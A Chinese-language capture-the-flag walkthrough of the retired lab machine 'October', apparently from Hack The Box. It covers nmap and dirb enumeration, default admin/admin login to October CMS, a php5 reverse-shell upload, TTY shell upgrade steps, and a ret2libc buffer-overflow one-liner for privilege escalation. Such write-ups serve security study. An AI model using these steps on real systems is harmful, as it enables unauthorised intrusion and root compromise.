本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关
靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.16
nmap -sV -sC -p- -T5 -oN october.nmap 10.10.10.16
nmap扫描结果
只有两个端口,访问web应用看看
点了上面的功能按钮,没发现什么有价值的信息,使用dirb命令跑下目录
试了下上面发现的目录都测试了下,发现uri地址backend访问是个登录界面,并且上面显示是october cms程序,谷歌搜索了下,是默认账号密码admin/admin能够正常登录进去
进去之后上面的功能都点击了一把,发现 http://10.10.10.16/backend/cms/media 可以直接上传文件,经过测试我直接上传php后缀文件显示失败,然后看到目标靶机的上已经有了一个php5后缀的文件
那么直接上传个php5格式的反弹shell代码,结果成功了, 并成功反弹shell (october cms exploit : https://www.exploit-db.com/exploits/41936)
这次我就是使用非python环境升级成tty-shell ,具体步骤如下
非 python环境tty-shell script /dev/null -c bash 在键盘上按住Ctrl+Z stty raw -echo fg reset 会让你输入类型,输入:xterm echo $TERM(查看类型,可以不执行) export TERM=xterm export SHELL=bash stty rows 54 columns 104 (得到这个是在本地kali执行 stty -a所获得)
最终获得了tty-shell,使用提权枚举脚本https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh 获取到本靶机是需要通过缓冲区溢出的方式进行提权,具体提权代码如下:
while true; do ./ovrflw $(python -c 'print "A"*112 + "x10x13x5exb7x60x42x5dxb7xacx3bx70xb7"');done
